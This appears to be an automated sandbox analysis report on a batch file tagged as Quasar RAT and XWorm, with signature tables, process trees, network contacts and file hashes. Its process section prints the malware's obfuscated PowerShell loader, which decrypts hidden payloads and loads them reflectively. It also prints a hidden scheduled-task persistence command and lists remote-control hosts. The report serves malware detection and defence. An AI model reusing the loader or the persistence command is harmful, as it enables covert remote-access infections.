Malware Analysis Report

2024-10-23 21:29

Sample ID 240413-wvprcsae8w
Target Client-built.bat
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9

Threat Level: Known bad

The file Client-built.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Quasar RAT

Quasar payload

Xworm

Detect Xworm Payload

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-13 18:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win10-20240404-en

Max time kernel

59s

Max time network

60s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2412 wrote to memory of 4672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 1872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 1872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4672 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 4672 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe
PID 4248 wrote to memory of 3708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4248 wrote to memory of 3708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 3708 wrote to memory of 2180 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3708 wrote to memory of 2180 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 2180 wrote to memory of 4060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_267_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_267.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_267.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_267.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_267.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_267.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp
US | 8.8.8.8:53 | api.telegram.org | udp
NL | 149.154.167.220:443 | api.telegram.org | tcp
US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | traffic-collins.gl.at.ply.gg | udp
US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp
US | 147.185.221.18:22562 | express-divorce.gl.at.ply.gg | tcp

Files

memory/4672-4-0x00000271D6F50000-0x00000271D6F72000-memory.dmp

memory/4672-5-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/4672-6-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-7-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-10-0x00000271D7150000-0x00000271D71C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yc3dmam0.bbn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4672-21-0x00000271D6FC0000-0x00000271D6FD0000-memory.dmp

memory/4672-26-0x00000271BED20000-0x00000271BED28000-memory.dmp

memory/4672-27-0x00000271D74B0000-0x00000271D75EA000-memory.dmp

memory/1872-36-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/1872-38-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-39-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-54-0x000001C6661C0000-0x000001C6661D0000-memory.dmp

memory/1872-72-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f404a1d6b3435ba3550ba6cbb87c6fbb
SHA1 6f61023a2f8114372a4ae62155dc86d066e3bfa8
SHA256 6ad86a2c8c7ab664622ab8e5a26d437c3f358fdc99f7cb15fc8279cec40eb059
SHA512 4fafaa336308e689e06808479a2d1e05fdc2a43bce6807b009527e06274821cc7d80c4fca7b50a1d826293c458e5cd5bac3f83dc804b59eef466ed288d152639

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Roaming\startup_str_267.vbs

MD5 90d9f9c1ee8b2748879d3f0d7692e6c5
SHA1 9a88b51f56d0c106bf2e13585b96acfef536cb90
SHA256 15d67a91884058d7464b1939c42db9f37a9317f7d43115f3613f463af7389a23
SHA512 bd961df405cc444200f26e157dec1fa19377f88d29092726a604b1e90fde4c50c9a56d15fac9dce7b9a292f75e11c011ee98f341bbe80d756f49af5089c96bd4

C:\Users\Admin\AppData\Roaming\startup_str_267.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/2180-88-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-90-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/2180-104-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/4672-110-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-113-0x000002613E490000-0x000002613E7B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/4060-123-0x0000000000F20000-0x0000000000F2E000-memory.dmp

memory/4060-124-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-125-0x000002613EEC0000-0x000002613EF10000-memory.dmp

memory/2180-126-0x000002613F2C0000-0x000002613F372000-memory.dmp

memory/2180-127-0x000002613F550000-0x000002613F712000-memory.dmp

memory/4060-129-0x000000001BCA0000-0x000000001BCB0000-memory.dmp

memory/2180-146-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/2180-147-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/2180-148-0x000002613DC90000-0x000002613DCA0000-memory.dmp

memory/4060-157-0x00007FF995070000-0x00007FF995A5C000-memory.dmp

memory/4060-158-0x000000001BCA0000-0x000000001BCB0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-13 18:14

Reported

2024-04-13 18:16

Platform

win10v2004-20240412-en

Max time kernel

54s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm

trojan rat xworm

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
